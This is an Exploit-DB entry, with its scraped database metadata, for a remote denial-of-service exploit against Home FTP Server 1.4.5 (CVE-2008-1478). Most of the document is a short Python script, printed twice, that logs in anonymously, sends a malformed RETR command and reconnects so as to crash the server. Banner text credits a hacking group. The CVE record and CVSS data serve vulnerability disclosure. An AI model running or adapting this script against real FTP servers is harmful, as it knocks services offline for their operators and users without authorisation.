Home FTP Server 1.4.5 - Remote Denial of Service Exploit
2008-03-17T00:00:00
ID EDB-ID:5270 Type exploitdb Reporter 0in Modified 2008-03-17T00:00:00
Description
Home FTP Server 1.4.5 Remote Denial of Service Exploit. CVE-2008-1478. Dos exploit for windows platform
# Discovered by 0in from DaRk-CodeRs Programming & Security Group
# Contact: 0in(dot)email[at]gmail(dot)com
# Thats a very funny bug, and nobody understand how it works;]
# When we send a python FTP retrlines() function bad command and create
# a new connection server got DoS... o0
# Thats not overflow, it's probubly in logic application.
# Greetings to all DaRk-CodeRs Members:
# Die_Angel, Sun8hclf, M4r1usz, Djlinux, Aristo89
# Special THX to: Rade0n3900
# Debug:
# ----------------------
# | EIP: 0100FE98 |
# | DS:[00FFFFED4]=??? |
# | ECX: 0100FED4 |
# ----------------------
from ftplib import FTP
import time
ip="127.0.0.1"
login="anonymous"
passwd = 'gorion@scriptkiddie.pl'
print '-------------------------------'
print '| HOME FTP SERVER DoS Exploit |'
print '| bY 0in From Dark-Coders! |'
print '|>>http://dark-coders.4rh.eu<<|'
print '-------------------------------'
print 'connecting...'
ftp=FTP(ip)
ftp.login(login,passwd)
print 'sending...'
try:
ftp.retrlines("AAAA")
except Exception:
print 'ok!\nreconnecting...'
ftp=FTP(ip)
ftp.quit()
print 'DosEd'
#EoFF
# milw0rm.com [2008-03-17]
{"id": "EDB-ID:5270", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Home FTP Server 1.4.5 - Remote Denial of Service Exploit", "description": "Home FTP Server 1.4.5 Remote Denial of Service Exploit. CVE-2008-1478. Dos exploit for windows platform", "published": "2008-03-17T00:00:00", "modified": "2008-03-17T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/5270/", "reporter": "0in", "references": [], "cvelist": ["CVE-2008-1478"], "lastseen": "2016-01-31T22:53:24", "viewCount": 5, "enchantments": {"score": {"value": 5.8, "vector": "NONE", "modified": "2016-01-31T22:53:24", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-1478"]}], "modified": "2016-01-31T22:53:24", "rev": 2}, "vulnersScore": 5.8}, "sourceHref": "https://www.exploit-db.com/download/5270/", "sourceData": "# Discovered by 0in from DaRk-CodeRs Programming & Security Group\n# Contact: 0in(dot)email[at]gmail(dot)com\n# Thats a very funny bug, and nobody understand how it works;]\n# When we send a python FTP retrlines() function bad command and create\n# a new connection server got DoS... o0\n# Thats not overflow, it's probubly in logic application.\n# Greetings to all DaRk-CodeRs Members:\n# Die_Angel, Sun8hclf, M4r1usz, Djlinux, Aristo89\n# Special THX to: Rade0n3900\n# Debug:\n# ----------------------\n# | EIP: 0100FE98 |\n# | DS:[00FFFFED4]=??? |\n# | ECX: 0100FED4 |\n# ----------------------\nfrom ftplib import FTP\nimport time\nip=\"127.0.0.1\"\nlogin=\"anonymous\"\npasswd = 'gorion@scriptkiddie.pl'\nprint '-------------------------------'\nprint '| HOME FTP SERVER DoS Exploit |'\nprint '| bY 0in From Dark-Coders! |'\nprint '|>>http://dark-coders.4rh.eu<<|'\nprint '-------------------------------'\nprint 'connecting...'\nftp=FTP(ip)\nftp.login(login,passwd)\nprint 'sending...'\ntry:\nftp.retrlines(\"AAAA\")\nexcept Exception:\nprint 'ok!\\nreconnecting...'\nftp=FTP(ip)\nftp.quit()\nprint 'DosEd'\n#EoFF\n\n# milw0rm.com [2008-03-17]\n", "osvdbidlist": ["43421"]}
{"cve": [{"lastseen": "2020-10-03T11:50:58", "description": "Home FTP Server 1.4.5.89 allows remote attackers to cause a denial of service (crash) by opening a FTP passive mode connection, then closing the original FTP connection. NOTE: some of these details are obtained from third party information.", "edition": 3, "cvss3": {}, "published": "2008-03-24T22:44:00", "title": "CVE-2008-1478", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-1478"], "modified": "2018-10-11T20:34:00", "cpe": ["cpe:/a:ari_pikivirta:home_ftp_server:1.4.5.89"], "id": "CVE-2008-1478", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-1478", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:ari_pikivirta:home_ftp_server:1.4.5.89:*:*:*:*:*:*:*"]}]}